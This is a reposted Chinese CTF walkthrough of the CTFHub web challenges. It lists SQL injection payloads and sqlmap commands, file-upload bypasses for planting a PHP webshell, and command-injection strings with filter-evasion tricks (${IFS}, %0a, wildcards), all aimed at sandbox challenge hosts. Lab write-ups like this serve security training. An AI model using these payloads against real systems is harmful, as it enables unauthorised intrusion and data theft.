27

【CTFHUB】Web技能树

 3 years ago
source link: http://www.cnblogs.com/vege/p/12990104.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Web

HTTP协议

请求方式

aqAfiaB.png!web

302跳转

IZfqIjM.png!web

cookie

73QrauN.png!web

基础认证

FzaMVrU.png!web

zu6zYnu.png!web

MnqEbyn.png!web

响应包源代码

iQZzA3f.png!web

信息泄露

目录遍历

QBBvymq.png!web

phpinfo

Inu6beQ.png!web

备份文件下载

网站源码

3mMbIz3.png!webbAbayaQ.png!web

QviQZvJ.png!web

bak文件

mI7beav.png!webrqQbQje.png!web

vim缓存

aABRFbU.png!web

下载下来放到linux中

在文件前面加的点(.)   .index.php.swp

然后运行 vi -r index.php

AZVv6v3.png!web

iaYnemn.png!web

.DS_Store

RzQzIbQ.png!web

记事本打开

Un6Bf23.png!web

E7va2uI.png!web

Git泄露

Log

python git_extract.py http://challenge-8cff71d12c02de35.sandbox.ctfhub.com:10080/.git/

7Nraa23.png!web

Stash

同上

 

Index

同上

SVN泄露

使用dvcs-ripper工具

2UZJF3b.png!web

yiEBNne.png!web

HG泄露

使用dvcs-ripper工具

3UZZnie.png!web

BBZzAvi.png!web

密码口令

弱口令

admin 123456

默认口令

百度搜索亿邮邮件网关默认口令

vUnymaU.png!web

SQL注入

整数型注入

jA36FrJ.png!web

字符型注入

Yb6NRfI.png!web

报错注入

extractvalue函数报错:       1 and ( extractvalue( 'anything',concat( '~', (select database()) ) ) );

updatexml函数报错:          1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

只能显示32位:

qAVbuia.png!web

substr(字符串,开始位置,长度)

qiU3AvJ.png!web

布尔盲注

sqlmap

sqlmap -u " http://challenge-520521e9124c0be8.sandbox.ctfhub.com:10080/?id=1 " --dbs -technique B

数据库 sqli   表 flag   字段 flag

时间盲注 JbuyYrI.png!web

sqlmap

sqlmap -u " http://challenge-58442e11e1306e17.sandbox.ctfhub.com:10080/?id=1 " --dbs -technique T

MySQL结构

-1 union select 1, group_concat(djbtjjrnuq) from sqli.pqfzaflkkt;

cookie注入

sqlmap -u " http://challenge-52d3494f9e4a406f.sandbox.ctfhub.com:10080/ " --cookie "id=1" --level 2 --dbs

UA注入

user-agent:   -1 union select 1,group_concat(hddxcgzzsv) from sqli.bgerzmdwpi;#

sqlmap: 

sqlmap -u " http://challenge-f7a6b5d5665981cc.sandbox.ctfhub.com:10080/ " --user-agent "123" --level 3 --dbs -technique U --dbms

Refer注入

同上,只不过在referer中输入SQL语句

XSS

反射型

rEfqMrZ.png!web

6ZNfArz.png

文件上传

无验证

7RRrU3u.png!web

NNjMv2Q.png!web

a22qYbF.png!web

Mb2Inir.png!web

前端验证

把PHP文件后缀改为jpg,抓包再改回php

mYBR32E.png!web

.htaccess

上传.htaccess和hhh.jpg

36j2UnF.png!web

MIME绕过

正常上传,抓包,将content-type改为 image/jpeg

ZB3ERf7.png!web

00截断

nqqeMvb.png!web

双写后缀

QrYbQnu.png!web

文件头检测

将一句话马改为jpg后缀,抓包,修改后缀为php,并添加gif头

A773M3a.png!web

RCE

命令注入

127.0.0.1 & ls

过滤cat

127.0.0.1 & more flag_162822816029866.php

AfmaEjn.png!web

过滤空格

使用${IFS}代替空格(可以代替空格的有IFS$9、%09、%0a、<、>、<>、{,}、${IFS}等)

过滤目录分隔符

使用;符号分割命令

127.0.0.1 & ls

发现flag_is_here目录

127.0.0.1 & cd flag_is_here;ls

发现flag_44052408916433.php文件

127.0.0.1& cd flag_is_here;ls;cat flag_44052408916433.php

查看源代码得到flag

过滤运算符

127.0.0.1 ; cat flag_991932693945.php

综合过滤练习

过滤了|,&,;, ,/,cat,flag,ctfhub

%0a(换行符)可以代替;符号,但是要在url处输入,不然会被再次转义

%09或者${IFS}等,可以替代空格

通配符 *   ?

127.0.0.1%09%0a%09cd%09fla?_is_here%0amore%09fla?_260832613315632.php#


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK